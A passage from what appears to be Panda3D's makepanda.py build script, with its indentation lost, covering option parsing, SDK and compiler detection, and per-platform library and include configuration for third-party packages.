elif (option=="--no-opengl"): PkgDisable("GL")
elif (option=="--no-directscripts"): pass
elif (option=="--directx-sdk"):
STRDXSDKVERSION = value.strip().lower()
if STRDXSDKVERSION == '':
print("No DirectX SDK version specified. Using 'default' DirectX SDK search")
STRDXSDKVERSION = 'default'
elif (option=="--windows-sdk"):
WINDOWS_SDK = value.strip().lower()
elif (option=="--msvc-version"):
MSVC_VERSION = value.strip().lower()
elif (option=="--use-icl"): BOOUSEINTELCOMPILER = True
elif (option=="--clean"): clean_build = True
else:
for pkg in PkgListGet():
if option == "--use-" + pkg.lower():
PkgEnable(pkg)
break
elif option == "--no-" + pkg.lower():
PkgDisable(pkg)
break
elif option == "--" + pkg.lower() + "-incdir":
PkgSetCustomLocation(pkg)
IncDirectory(pkg, value)
break
elif option == "--" + pkg.lower() + "-libdir":
PkgSetCustomLocation(pkg)
LibDirectory(pkg, value)
break
if (option == "--everything" or option.startswith("--use-")
or option == "--nothing" or option.startswith("--no-")):
anything = 1
except:
usage(sys.exc_info()[1])
if not anything:
if RUNTIME:
PkgEnableAll()
else:
usage("You should specify a list of packages to use or --everything to enable all packages.")
if (RTDIST and RUNTIME):
usage("Options --runtime and --rtdist cannot be specified at the same time!")
if (optimize=="" and (RTDIST or RUNTIME)): optimize = "4"
elif (optimize==""): optimize = "3"
if OSXTARGET:
try:
maj, min = OSXTARGET.strip().split('.')
OSXTARGET = int(maj), int(min)
assert OSXTARGET[0] == 10
except:
usage("Invalid setting for OSXTARGET")
else:
OSXTARGET = None
if target is not None or target_arch is not None:
SetTarget(target, target_arch)
if universal:
if target_arch:
exit("--universal is incompatible with --arch")
OSX_ARCHS.append("i386")
if OSXTARGET:
osxver = OSXTARGET
else:
maj, min = platform.mac_ver()[0].split('.')[:2]
osxver = int(maj), int(min)
if osxver[1] < 6:
OSX_ARCHS.append("ppc")
else:
OSX_ARCHS.append("x86_64")
elif HasTargetArch():
OSX_ARCHS.append(GetTargetArch())
try:
SetOptimize(int(optimize))
assert GetOptimize() in [1, 2, 3, 4]
except:
usage("Invalid setting for OPTIMIZE")
if GIT_COMMIT is not None and not re.match("^[a-f0-9]{40}$", GIT_COMMIT):
usage("Invalid SHA-1 hash given for --git-commit option!")
if GetTarget() == 'windows':
if not MSVC_VERSION:
print("No MSVC version specified. Defaulting to 14 (Visual Studio 2015).")
MSVC_VERSION = (14, 0)
else:
try:
MSVC_VERSION = tuple(int(d) for d in MSVC_VERSION.split('.'))[:2]
if (len(MSVC_VERSION) == 1):
MSVC_VERSION += (0,)
except:
usage("Invalid setting for --msvc-version")
if MSVC_VERSION < (14, 0):
warn_prefix = "%sERROR:%s " % (GetColor("red"), GetColor())
print("=========================================================================")
print(warn_prefix + "Support for MSVC versions before 2015 has been discontinued.")
print(warn_prefix + "For more information, or any questions, please visit:")
print(warn_prefix + " https://github.com/panda3d/panda3d/issues/288")
print("=========================================================================")
sys.stdout.flush()
time.sleep(1.0)
sys.exit(1)
if not WINDOWS_SDK:
print("No Windows SDK version specified. Defaulting to '7.1'.")
WINDOWS_SDK = '7.1'
if clean_build and os.path.isdir(GetOutputDir()):
print("Deleting %s" % (GetOutputDir()))
shutil.rmtree(GetOutputDir())
parseopts(sys.argv[1:])
########################################################################
##
## Handle environment variables.
##
########################################################################
if ("CFLAGS" in os.environ):
CFLAGS = os.environ["CFLAGS"].strip()
if ("CXXFLAGS" in os.environ):
CXXFLAGS = os.environ["CXXFLAGS"].strip()
if ("RPM_OPT_FLAGS" in os.environ):
CFLAGS += " " + os.environ["RPM_OPT_FLAGS"].strip()
CXXFLAGS += " " + os.environ["RPM_OPT_FLAGS"].strip()
if ("LDFLAGS" in os.environ):
LDFLAGS = os.environ["LDFLAGS"].strip()
os.environ["MAKEPANDA"] = os.path.abspath(sys.argv[0])
if GetHost() == "darwin" and OSXTARGET is not None:
os.environ["MACOSX_DEPLOYMENT_TARGET"] = "%d.%d" % OSXTARGET
########################################################################
##
## Configure things based on the command-line parameters.
##
########################################################################
PLUGIN_VERSION = ParsePluginVersion("dtool/PandaVersion.pp")
COREAPI_VERSION = PLUGIN_VERSION + "." + ParseCoreapiVersion("dtool/PandaVersion.pp")
if VERSION is None:
if RUNTIME:
VERSION = PLUGIN_VERSION
else:
# Take the value from the setup.cfg file.
VERSION = GetMetadataValue('version')
if WHLVERSION is None:
WHLVERSION = VERSION
print("Version: %s" % VERSION)
if RUNTIME or RTDIST:
print("Core API Version: %s" % COREAPI_VERSION)
if DEBVERSION is None:
DEBVERSION = VERSION
MAJOR_VERSION = '.'.join(VERSION.split('.')[:2])
if P3DSUFFIX is None:
P3DSUFFIX = MAJOR_VERSION
outputdir_suffix = ""
if (RUNTIME or RTDIST):
# Compiling Maya/Max is pointless in rtdist build
for ver in MAYAVERSIONS + MAXVERSIONS:
PkgDisable(ver)
if (DISTRIBUTOR.strip() == ""):
exit("You must provide a valid distributor name when making a runtime or rtdist build!")
outputdir_suffix += "_" + DISTRIBUTOR.strip()
if (RUNTIME):
outputdir_suffix += "_rt"
if DISTRIBUTOR == "":
DISTRIBUTOR = "makepanda"
elif not RTDIST_VERSION:
RTDIST_VERSION = DISTRIBUTOR.strip() + "_" + MAJOR_VERSION
if not RTDIST_VERSION:
RTDIST_VERSION = "dev"
if not IsCustomOutputDir():
if GetTarget() == "windows" and GetTargetArch() == 'x64':
outputdir_suffix += '_x64'
SetOutputDir("built" + outputdir_suffix)
if (RUNTIME):
for pkg in PkgListGet():
if pkg in ["GTK2", "MFC"]:
# Optional package(s) for runtime.
pass
elif pkg in ["OPENSSL", "ZLIB"]:
# Required packages for runtime.
if (PkgSkip(pkg)==1):
exit("Runtime must be compiled with OpenSSL and ZLib support!")
else:
# Unused packages for runtime.
PkgDisable(pkg)
if (INSTALLER and RTDIST):
exit("Cannot build an installer for the rtdist build!")
if (WHEEL and RUNTIME):
exit("Cannot build a wheel for the runtime build!")
if (WHEEL and RTDIST):
exit("Cannot build a wheel for the rtdist build!")
if (INSTALLER) and (PkgSkip("PYTHON")) and (not RUNTIME) and GetTarget() == 'windows':
exit("Cannot build installer on Windows without python")
if WHEEL and PkgSkip("PYTHON"):
exit("Cannot build wheel without Python")
if (RTDIST) and (PkgSkip("WX") and PkgSkip("FLTK")):
exit("Cannot build rtdist without wx or fltk")
if (RUNTIME):
SetLinkAllStatic(True)
if not os.path.isdir("contrib"):
PkgDisable("CONTRIB")
########################################################################
##
## Load the dependency cache.
##
########################################################################
LoadDependencyCache()
########################################################################
##
## Locate various SDKs.
##
########################################################################
MakeBuildTree()
SdkLocateDirectX(STRDXSDKVERSION)
SdkLocateMaya()
SdkLocateMax()
SdkLocateMacOSX(OSXTARGET)
SdkLocatePython(RTDIST)
SdkLocateWindows(WINDOWS_SDK)
SdkLocatePhysX()
SdkLocateSpeedTree()
SdkLocateAndroid()
SdkAutoDisableDirectX()
SdkAutoDisableMaya()
SdkAutoDisableMax()
SdkAutoDisablePhysX()
SdkAutoDisableSpeedTree()
if RTDIST and DISTRIBUTOR == "cmu":
# Some validation checks for the CMU builds.
if (RTDIST_VERSION == "cmu_1.7" and SDK["PYTHONVERSION"] != "python2.6"):
exit("The CMU 1.7 runtime distribution must be built against Python 2.6!")
elif (RTDIST_VERSION == "cmu_1.8" and SDK["PYTHONVERSION"] != "python2.7"):
exit("The CMU 1.8 runtime distribution must be built against Python 2.7!")
elif (RTDIST_VERSION == "cmu_1.9" and SDK["PYTHONVERSION"] != "python2.7"):
exit("The CMU 1.9 runtime distribution must be built against Python 2.7!")
if RTDIST and not HOST_URL:
exit("You must specify a host URL when building the rtdist!")
if RUNTIME and not HOST_URL:
# Set this to a nice default.
HOST_URL = "https://runtime.panda3d.org/"
########################################################################
##
## Choose a Compiler.
##
## This should also set up any environment variables needed to make
## the compiler work.
##
########################################################################
if GetHost() == 'windows' and GetTarget() == 'windows':
COMPILER = "MSVC"
SdkLocateVisualStudio(MSVC_VERSION)
else:
COMPILER = "GCC"
SetupBuildEnvironment(COMPILER)
########################################################################
##
## External includes, external libraries, and external defsyms.
##
########################################################################
IncDirectory("ALWAYS", GetOutputDir()+"/tmp")
IncDirectory("ALWAYS", GetOutputDir()+"/include")
if (COMPILER == "MSVC"):
PkgDisable("X11")
PkgDisable("GLES")
PkgDisable("GLES2")
PkgDisable("EGL")
PkgDisable("CARBON")
PkgDisable("COCOA")
DefSymbol("FLEX", "YY_NO_UNISTD_H")
if (PkgSkip("PYTHON")==0):
IncDirectory("ALWAYS", SDK["PYTHON"] + "/include")
LibDirectory("ALWAYS", SDK["PYTHON"] + "/libs")
SmartPkgEnable("EIGEN", "eigen3", (), ("Eigen/Dense",), target_pkg = 'ALWAYS')
for pkg in PkgListGet():
if (PkgSkip(pkg)==0):
if (pkg[:4]=="MAYA"):
IncDirectory(pkg, SDK[pkg] + "/include")
DefSymbol(pkg, "MAYAVERSION", pkg)
DefSymbol(pkg, "MLIBRARY_DONTUSE_MFC_MANIFEST", "")
elif (pkg[:3]=="MAX"):
IncDirectory(pkg, SDK[pkg] + "/include")
IncDirectory(pkg, SDK[pkg] + "/include/CS")
IncDirectory(pkg, SDK[pkg+"CS"] + "/include")
IncDirectory(pkg, SDK[pkg+"CS"] + "/include/CS")
DefSymbol(pkg, "MAX", pkg)
if (int(pkg[3:]) >= 2013):
DefSymbol(pkg, "UNICODE", "")
DefSymbol(pkg, "_UNICODE", "")
elif (pkg[:2]=="DX"):
IncDirectory(pkg, SDK[pkg] + "/include")
elif GetThirdpartyDir() is not None:
IncDirectory(pkg, GetThirdpartyDir() + pkg.lower() + "/include")
for pkg in DXVERSIONS:
if (PkgSkip(pkg)==0):
vnum=pkg[2:]
if GetTargetArch() == 'x64':
LibDirectory(pkg, SDK[pkg] + '/lib/x64')
else:
LibDirectory(pkg, SDK[pkg] + '/lib/x86')
LibDirectory(pkg, SDK[pkg] + '/lib')
LibName(pkg, 'd3dVNUM.lib'.replace("VNUM", vnum))
LibName(pkg, 'd3dxVNUM.lib'.replace("VNUM", vnum))
if int(vnum) >= 9 and "GENERIC_DXERR_LIBRARY" in SDK:
LibName(pkg, 'dxerr.lib')
else:
LibName(pkg, 'dxerrVNUM.lib'.replace("VNUM", vnum))
#LibName(pkg, 'ddraw.lib')
LibName(pkg, 'dxguid.lib')
if SDK.get("VISUALSTUDIO_VERSION") >= (14,0):
# dxerr needs this for __vsnwprintf definition.
LibName(pkg, 'legacy_stdio_definitions.lib')
if not PkgSkip("FREETYPE") and os.path.isdir(GetThirdpartyDir() + "freetype/include/freetype2"):
IncDirectory("FREETYPE", GetThirdpartyDir() + "freetype/include/freetype2")
IncDirectory("ALWAYS", GetThirdpartyDir() + "extras/include")
LibName("WINSOCK", "wsock32.lib")
LibName("WINSOCK2", "wsock32.lib")
LibName("WINSOCK2", "ws2_32.lib")
LibName("WINCOMCTL", "comctl32.lib")
LibName("WINCOMDLG", "comdlg32.lib")
LibName("WINUSER", "user32.lib")
LibName("WINMM", "winmm.lib")
LibName("WINIMM", "imm32.lib")
LibName("WINKERNEL", "kernel32.lib")
LibName("WINOLE", "ole32.lib")
LibName("WINOLEAUT", "oleaut32.lib")
LibName("WINOLDNAMES", "oldnames.lib")
LibName("WINSHELL", "shell32.lib")
LibName("WINGDI", "gdi32.lib")
LibName("ADVAPI", "advapi32.lib")
LibName("IPHLPAPI", "iphlpapi.lib")
LibName("GL", "opengl32.lib")
LibName("GLES", "libgles_cm.lib")
LibName("GLES2", "libGLESv2.lib")
LibName("EGL", "libEGL.lib")
LibName("MSIMG", "msimg32.lib")
if (PkgSkip("DIRECTCAM")==0): LibName("DIRECTCAM", "strmiids.lib")
if (PkgSkip("DIRECTCAM")==0): LibName("DIRECTCAM", "quartz.lib")
if (PkgSkip("DIRECTCAM")==0): LibName("DIRECTCAM", "odbc32.lib")
if (PkgSkip("DIRECTCAM")==0): LibName("DIRECTCAM", "odbccp32.lib")
if (PkgSkip("OPENSSL")==0):
if os.path.isfile(GetThirdpartyDir() + "openssl/lib/libpandassl.lib"):
LibName("OPENSSL", GetThirdpartyDir() + "openssl/lib/libpandassl.lib")
LibName("OPENSSL", GetThirdpartyDir() + "openssl/lib/libpandaeay.lib")
else:
LibName("OPENSSL", GetThirdpartyDir() + "openssl/lib/libeay32.lib")
LibName("OPENSSL", GetThirdpartyDir() + "openssl/lib/ssleay32.lib")
if (PkgSkip("PNG")==0):
if os.path.isfile(GetThirdpartyDir() + "png/lib/libpng16_static.lib"):
LibName("PNG", GetThirdpartyDir() + "png/lib/libpng16_static.lib")
else:
LibName("PNG", GetThirdpartyDir() + "png/lib/libpng_static.lib")
if (PkgSkip("TIFF")==0):
if os.path.isfile(GetThirdpartyDir() + "tiff/lib/libtiff.lib"):
LibName("TIFF", GetThirdpartyDir() + "tiff/lib/libtiff.lib")
else:
LibName("TIFF", GetThirdpartyDir() + "tiff/lib/tiff.lib")
if (PkgSkip("OPENEXR")==0):
suffix = ""
if os.path.isfile(GetThirdpartyDir() + "openexr/lib/IlmImf-2_2.lib"):
suffix = "-2_2"
LibName("OPENEXR", GetThirdpartyDir() + "openexr/lib/IlmImf" + suffix + ".lib")
LibName("OPENEXR", GetThirdpartyDir() + "openexr/lib/IlmThread" + suffix + ".lib")
LibName("OPENEXR", GetThirdpartyDir() + "openexr/lib/Iex" + suffix + ".lib")
LibName("OPENEXR", GetThirdpartyDir() + "openexr/lib/Half.lib")
IncDirectory("OPENEXR", GetThirdpartyDir() + "openexr/include/OpenEXR")
if (PkgSkip("JPEG")==0): LibName("JPEG", GetThirdpartyDir() + "jpeg/lib/jpeg-static.lib")
if (PkgSkip("ZLIB")==0): LibName("ZLIB", GetThirdpartyDir() + "zlib/lib/zlibstatic.lib")
if (PkgSkip("VRPN")==0): LibName("VRPN", GetThirdpartyDir() + "vrpn/lib/vrpn.lib")
if (PkgSkip("VRPN")==0): LibName("VRPN", GetThirdpartyDir() + "vrpn/lib/quat.lib")
if (PkgSkip("NVIDIACG")==0): LibName("CGGL", GetThirdpartyDir() + "nvidiacg/lib/cgGL.lib")
if (PkgSkip("NVIDIACG")==0): LibName("CGDX9", GetThirdpartyDir() + "nvidiacg/lib/cgD3D9.lib")
if (PkgSkip("NVIDIACG")==0): LibName("NVIDIACG", GetThirdpartyDir() + "nvidiacg/lib/cg.lib")
if (PkgSkip("FREETYPE")==0): LibName("FREETYPE", GetThirdpartyDir() + "freetype/lib/freetype.lib")
if (PkgSkip("HARFBUZZ")==0):
LibName("HARFBUZZ", GetThirdpartyDir() + "harfbuzz/lib/harfbuzz.lib")
IncDirectory("HARFBUZZ", GetThirdpartyDir() + "harfbuzz/include/harfbuzz")
if (PkgSkip("FFTW")==0): LibName("FFTW", GetThirdpartyDir() + "fftw/lib/fftw3.lib")
if (PkgSkip("ARTOOLKIT")==0):LibName("ARTOOLKIT",GetThirdpartyDir() + "artoolkit/lib/libAR.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/cv.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/highgui.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/cvaux.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/ml.lib")
if (PkgSkip("OPENCV")==0): LibName("OPENCV", GetThirdpartyDir() + "opencv/lib/cxcore.lib")
if (PkgSkip("AWESOMIUM")==0):LibName("AWESOMIUM",GetThirdpartyDir() + "awesomium/lib/Awesomium.lib")
if (PkgSkip("FFMPEG")==0): LibName("FFMPEG", GetThirdpartyDir() + "ffmpeg/lib/avcodec.lib")
if (PkgSkip("FFMPEG")==0): LibName("FFMPEG", GetThirdpartyDir() + "ffmpeg/lib/avformat.lib")
if (PkgSkip("FFMPEG")==0): LibName("FFMPEG", GetThirdpartyDir() + "ffmpeg/lib/avutil.lib")
if (PkgSkip("SWSCALE")==0): LibName("SWSCALE", GetThirdpartyDir() + "ffmpeg/lib/swscale.lib")
if (PkgSkip("SWRESAMPLE")==0):LibName("SWRESAMPLE",GetThirdpartyDir() + "ffmpeg/lib/swresample.lib")
if (PkgSkip("FCOLLADA")==0):
LibName("FCOLLADA", GetThirdpartyDir() + "fcollada/lib/FCollada.lib")
IncDirectory("FCOLLADA", GetThirdpartyDir() + "fcollada/include/FCollada")
if (PkgSkip("ASSIMP")==0):
LibName("ASSIMP", GetThirdpartyDir() + "assimp/lib/assimp.lib")
IncDirectory("ASSIMP", GetThirdpartyDir() + "assimp/include/assimp")
if (PkgSkip("SQUISH")==0):
if GetOptimize() <= 2:
LibName("SQUISH", GetThirdpartyDir() + "squish/lib/squishd.lib")
else:
LibName("SQUISH", GetThirdpartyDir() + "squish/lib/squish.lib")
if (PkgSkip("ROCKET")==0):
LibName("ROCKET", GetThirdpartyDir() + "rocket/lib/RocketCore.lib")
LibName("ROCKET", GetThirdpartyDir() + "rocket/lib/RocketControls.lib")
if (PkgSkip("PYTHON")==0):
LibName("ROCKET", GetThirdpartyDir() + "rocket/lib/" + SDK["PYTHONVERSION"] + "/boost_python-vc100-mt-1_54.lib")
if (GetOptimize() <= 3):
LibName("ROCKET", GetThirdpartyDir() + "rocket/lib/RocketDebugger.lib")
if (PkgSkip("OPENAL")==0):
LibName("OPENAL", GetThirdpartyDir() + "openal/lib/OpenAL32.lib")
if not os.path.isfile(GetThirdpartyDir() + "openal/bin/OpenAL32.dll"):
# Link OpenAL Soft statically.
DefSymbol("OPENAL", "AL_LIBTYPE_STATIC")
if (PkgSkip("ODE")==0):
LibName("ODE", GetThirdpartyDir() + "ode/lib/ode_single.lib")
DefSymbol("ODE", "dSINGLE", "")
if (PkgSkip("FMODEX")==0):
if (GetTargetArch() == 'x64'):
LibName("FMODEX", GetThirdpartyDir() + "fmodex/lib/fmodex64_vc.lib")
else:
LibName("FMODEX", GetThirdpartyDir() + "fmodex/lib/fmodex_vc.lib")
if (PkgSkip("FLTK")==0 and RTDIST):
LibName("FLTK", GetThirdpartyDir() + "fltk/lib/fltk.lib")
if not PkgSkip("FLTK"):
# If we have fltk, we don't need wx
PkgDisable("WX")
if (PkgSkip("WX")==0 and RTDIST):
LibName("WX", GetThirdpartyDir() + "wx/lib/wxbase28u.lib")
LibName("WX", GetThirdpartyDir() + "wx/lib/wxmsw28u_core.lib")
DefSymbol("WX", "__WXMSW__", "")
DefSymbol("WX", "_UNICODE", "")
DefSymbol("WX", "UNICODE", "")
if (PkgSkip("VORBIS")==0):
for lib in ('ogg', 'vorbis', 'vorbisfile'):
path = GetThirdpartyDir() + "vorbis/lib/lib{0}_static.lib".format(lib)
if not os.path.isfile(path):
path = GetThirdpartyDir() + "vorbis/lib/{0}.lib".format(lib)
LibName("VORBIS", path)
if (PkgSkip("OPUS")==0):
LibName("OPUS", GetThirdpartyDir() + "opus/lib/libogg_static.lib")
LibName("OPUS", GetThirdpartyDir() + "opus/lib/libopus_static.lib")
LibName("OPUS", GetThirdpartyDir() + "opus/lib/libopusfile_static.lib")
for pkg in MAYAVERSIONS:
if (PkgSkip(pkg)==0):
LibName(pkg, '"' + SDK[pkg] + '/lib/Foundation.lib"')
LibName(pkg, '"' + SDK[pkg] + '/lib/OpenMaya.lib"')
LibName(pkg, '"' + SDK[pkg] + '/lib/OpenMayaAnim.lib"')
LibName(pkg, '"' + SDK[pkg] + '/lib/OpenMayaUI.lib"')
for pkg in MAXVERSIONS:
if (PkgSkip(pkg)==0):
LibName(pkg, SDK[pkg] + '/lib/core.lib')
LibName(pkg, SDK[pkg] + '/lib/edmodel.lib')
LibName(pkg, SDK[pkg] + '/lib/gfx.lib')
LibName(pkg, SDK[pkg] + '/lib/geom.lib')
LibName(pkg, SDK[pkg] + '/lib/mesh.lib')
LibName(pkg, SDK[pkg] + '/lib/maxutil.lib')
LibName(pkg, SDK[pkg] + '/lib/paramblk2.lib')
if (PkgSkip("PHYSX")==0):
if GetTargetArch() == 'x64':
LibName("PHYSX", SDK["PHYSXLIBS"] + "/PhysXLoader64.lib")
LibName("PHYSX", SDK["PHYSXLIBS"] + "/NxCharacter64.lib")
else:
LibName("PHYSX", SDK["PHYSXLIBS"] + "/PhysXLoader.lib")
LibName("PHYSX", SDK["PHYSXLIBS"] + "/NxCharacter.lib")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Physics/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/PhysXLoader/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/NxCharacter/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/NxExtensions/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Foundation/include")
IncDirectory("PHYSX", SDK["PHYSX"] + "/Cooking/include")
if (PkgSkip("SPEEDTREE")==0):
if GetTargetArch() == 'x64':
libdir = SDK["SPEEDTREE"] + "/Lib/Windows/VC10.x64/"
p64ext = '64'
else:
libdir = SDK["SPEEDTREE"] + "/Lib/Windows/VC10/"
p64ext = ''
debugext = ''
if (GetOptimize() <= 2): debugext = "_d"
libsuffix = "_v%s_VC100MT%s_Static%s.lib" % (
SDK["SPEEDTREEVERSION"], p64ext, debugext)
LibName("SPEEDTREE", "%sSpeedTreeCore%s" % (libdir, libsuffix))
LibName("SPEEDTREE", "%sSpeedTreeForest%s" % (libdir, libsuffix))
LibName("SPEEDTREE", "%sSpeedTree%sRenderer%s" % (libdir, SDK["SPEEDTREEAPI"], libsuffix))
LibName("SPEEDTREE", "%sSpeedTreeRenderInterface%s" % (libdir, libsuffix))
if (SDK["SPEEDTREEAPI"] == "OpenGL"):
LibName("SPEEDTREE", "%sglew32.lib" % (libdir))
LibName("SPEEDTREE", "glu32.lib")
IncDirectory("SPEEDTREE", SDK["SPEEDTREE"] + "/Include")
if (PkgSkip("BULLET")==0):
suffix = '.lib'
if GetTargetArch() == 'x64' and os.path.isfile(GetThirdpartyDir() + "bullet/lib/BulletCollision_x64.lib"):
suffix = '_x64.lib'
LibName("BULLET", GetThirdpartyDir() + "bullet/lib/LinearMath" + suffix)
LibName("BULLET", GetThirdpartyDir() + "bullet/lib/BulletCollision" + suffix)
LibName("BULLET", GetThirdpartyDir() + "bullet/lib/BulletDynamics" + suffix)
LibName("BULLET", GetThirdpartyDir() + "bullet/lib/BulletSoftBody" + suffix)
if (COMPILER=="GCC"):
PkgDisable("AWESOMIUM")
if GetTarget() != "darwin":
PkgDisable("CARBON")
PkgDisable("COCOA")
elif RUNTIME:
# We don't support Cocoa in the runtime yet.
PkgDisable("COCOA")
if 'x86_64' in OSX_ARCHS:
# 64-bits OS X doesn't have Carbon.
PkgDisable("CARBON")
#if (PkgSkip("PYTHON")==0):
# IncDirectory("PYTHON", SDK["PYTHON"])
if (GetHost() == "darwin"):
if (PkgSkip("FREETYPE")==0 and not os.path.isdir(GetThirdpartyDir() + 'freetype')):
IncDirectory("FREETYPE", "/usr/X11/include")
IncDirectory("FREETYPE", "/usr/X11/include/freetype2")
LibDirectory("FREETYPE", "/usr/X11/lib")
if (GetHost() == "freebsd"):
IncDirectory("ALWAYS", "/usr/local/include")
LibDirectory("ALWAYS", "/usr/local/lib")
if (os.path.isdir("/usr/PCBSD")):
IncDirectory("ALWAYS", "/usr/PCBSD/local/include")
LibDirectory("ALWAYS", "/usr/PCBSD/local/lib")
if GetTarget() != "windows":
PkgDisable("DIRECTCAM")
fcollada_libs = ("FColladaD", "FColladaSD", "FColladaS")
# WARNING! The order of the ffmpeg libraries matters!
ffmpeg_libs = ("libavformat", "libavcodec", "libavutil")
# Name pkg-config libs, include(dir)s
if (not RUNTIME):
SmartPkgEnable("EIGEN", "eigen3", (), ("Eigen/Dense",), target_pkg = 'ALWAYS')
SmartPkgEnable("ARTOOLKIT", "", ("AR"), "AR/ar.h")
SmartPkgEnable("FCOLLADA", "", ChooseLib(fcollada_libs, "FCOLLADA"), ("FCollada", "FCollada/FCollada.h"))
SmartPkgEnable("ASSIMP", "", ("assimp"), "assimp")
SmartPkgEnable("FFMPEG", ffmpeg_libs, ffmpeg_libs, ("libavformat/avformat.h", "libavcodec/avcodec.h", "libavutil/avutil.h"))
SmartPkgEnable("SWSCALE", "libswscale", "libswscale", ("libswscale/swscale.h"), target_pkg = "FFMPEG", thirdparty_dir = "ffmpeg")
SmartPkgEnable("SWRESAMPLE","libswresample", "libswresample", ("libswresample/swresample.h"), target_pkg = "FFMPEG", thirdparty_dir = "ffmpeg")
SmartPkgEnable("FFTW", "", ("fftw3"), ("fftw.h"))
SmartPkgEnable("FMODEX", "", ("fmodex"), ("fmodex", "fmodex/fmod.h"))
SmartPkgEnable("FREETYPE", "freetype2", ("freetype"), ("freetype2", "freetype2/freetype/freetype.h"))
SmartPkgEnable("HARFBUZZ", "harfbuzz", ("harfbuzz"), ("harfbuzz", "harfbuzz/hb-ft.h"))
SmartPkgEnable("GL", "gl", ("GL"), ("GL/gl.h"), framework = "OpenGL")
SmartPkgEnable("GLES", "glesv1_cm", ("GLESv1_CM"), ("GLES/gl.h"), framework = "OpenGLES")
SmartPkgEnable("GLES2", "glesv2", ("GLESv2"), ("GLES2/gl2.h")) #framework = "OpenGLES"?
SmartPkgEnable("EGL", "egl", ("EGL"), ("EGL/egl.h"))
SmartPkgEnable("NVIDIACG", "", ("Cg"), "Cg/cg.h", framework = "Cg")
SmartPkgEnable("ODE", "", ("ode"), "ode/ode.h", tool = "ode-config")
SmartPkgEnable("OPENAL", "openal", ("openal"), "AL/al.h", framework = "OpenAL")
SmartPkgEnable("SQUISH", "", ("squish"), "squish.h")
SmartPkgEnable("TIFF", "libtiff-4", ("tiff"), "tiff.h")
SmartPkgEnable("OPENEXR", "OpenEXR", ("IlmImf", "Imath", "Half", "Iex", "IexMath", "IlmThread"), ("OpenEXR", "OpenEXR/ImfOutputFile.h"))
SmartPkgEnable("VRPN", "", ("vrpn", "quat"), ("vrpn", "quat.h", "vrpn/vrpn_Types.h"))
SmartPkgEnable("BULLET", "bullet", ("BulletSoftBody", "BulletDynamics", "BulletCollision", "LinearMath"), ("bullet", "bullet/btBulletDynamicsCommon.h"))
SmartPkgEnable("VORBIS", "vorbisfile",("vorbisfile", "vorbis", "ogg"), ("ogg/ogg.h", "vorbis/vorbisfile.h"))
SmartPkgEnable("OPUS", "opusfile", ("opusfile", "opus", "ogg"), ("ogg/ogg.h", "opus/opusfile.h", "opus"))
SmartPkgEnable("JPEG", "", ("jpeg"), "jpeglib.h")
SmartPkgEnable("PNG", "libpng", ("png"), "png.h", tool = "libpng-config")
if not PkgSkip("FFMPEG"):
if GetTarget() == "darwin":
LibName("FFMPEG", "-Wl,-read_only_relocs,suppress")
LibName("FFMPEG", "-framework VideoDecodeAcceleration")
elif os.path.isfile(GetThirdpartyDir() + "ffmpeg/lib/libavcodec.a"):
# Needed when linking ffmpeg statically on Linux.
LibName("FFMPEG", "-Wl,-Bsymbolic")
if PkgSkip("FFMPEG") or GetTarget() == "darwin":
cv_lib = ChooseLib(("opencv_core", "cv"), "OPENCV")
if cv_lib == "opencv_core":
OPENCV_VER_23 = True
SmartPkgEnable("OPENCV", "opencv", ("opencv_core", "opencv_highgui"), ("opencv2/core/core.hpp"))
else:
SmartPkgEnable("OPENCV", "opencv", ("cv", "highgui", "cvaux", "ml", "cxcore"),
("opencv", "opencv/cv.h", "opencv/cxcore.h", "opencv/highgui.h"))
else:
PkgDisable("OPENCV")
rocket_libs = ("RocketCore", "RocketControls")
if (GetOptimize() <= 3):
rocket_libs += ("RocketDebugger",)
rocket_libs += ("boost_python",)
SmartPkgEnable("ROCKET", "", rocket_libs, "Rocket/Core.h")
if not PkgSkip("PYTHON"):
python_lib = SDK["PYTHONVERSION"]
if not RTDIST and GetTarget() != 'android':
# We don't link anything in the SDK with libpython.
python_lib = ""
SmartPkgEnable("PYTHON", "", python_lib, (SDK["PYTHONVERSION"], SDK["PYTHONVERSION"] + "/Python.h"))
SmartPkgEnable("OPENSSL", "openssl", ("ssl", "crypto"), ("openssl/ssl.h", "openssl/crypto.h"))
SmartPkgEnable("ZLIB", "zlib", ("z"), "zlib.h")
SmartPkgEnable("GTK2", "gtk+-2.0")
if (RTDIST):
SmartPkgEnable("WX", tool = "wx-config")
SmartPkgEnable("FLTK", "", ("fltk"), ("FL/Fl.H"), tool = "fltk-config")
if GetTarget() != 'darwin':
# CgGL is covered by the Cg framework, and we don't need X11 components on OSX
if not PkgSkip("NVIDIACG") and not RUNTIME:
SmartPkgEnable("CGGL", "", ("CgGL"), "Cg/cgGL.h", thirdparty_dir = "nvidiacg")
if not RUNTIME:
SmartPkgEnable("X11", "x11", "X11", ("X11", "X11/Xlib.h", "X11/XKBlib.h"))
if GetHost() != "darwin":
# Workaround for an issue where pkg-config does not include this path
if GetTargetArch() in ("x86_64", "amd64"):
if (os.path.isdir("/usr/lib64/glib-2.0/include")):
IncDirectory("GTK2", "/usr/lib64/glib-2.0/include")
if (os.path.isdir("/usr/lib64/gtk-2.0/include")):
IncDirectory("GTK2", "/usr/lib64/gtk-2.0/include")
if not PkgSkip("X11"):
if (os.path.isdir("/usr/X11R6/lib64")):
LibDirectory("ALWAYS", "/usr/X11R6/lib64")
else:
LibDirectory("ALWAYS", "/usr/X11R6/lib")
elif not PkgSkip("X11"):
LibDirectory("ALWAYS", "/usr/X11R6/lib")
if RUNTIME:
# For the runtime, these packages are required
for pkg in ["OPENSSL", "ZLIB"]:
skips = []
if (pkg in PkgListGet() and PkgSkip(pkg)==1):
skips.append(pkg)
if skips:
exit("Runtime must be compiled with OpenSSL and ZLib support (missing %s)" % (', '.join(skips)))
for pkg in MAYAVERSIONS:
if (PkgSkip(pkg)==0 and (pkg in SDK)):
if (GetHost() == "darwin"):
